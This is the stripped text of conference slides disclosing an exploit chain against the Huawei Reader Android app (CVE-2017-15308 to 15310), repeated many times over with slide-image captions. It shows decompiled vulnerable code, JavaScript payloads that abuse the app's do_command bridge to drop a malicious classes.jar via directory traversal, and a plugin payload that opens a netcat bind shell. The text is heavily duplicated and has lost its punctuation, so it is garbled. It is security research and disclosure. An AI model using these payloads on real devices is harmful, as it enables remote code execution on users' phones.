if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 39: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/39.jpg)
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 40: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/40.jpg)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 41: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/41.jpg)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 42: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/42.jpg)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 43: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/43.jpg)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 44: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/44.jpg)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 45: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/45.jpg)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
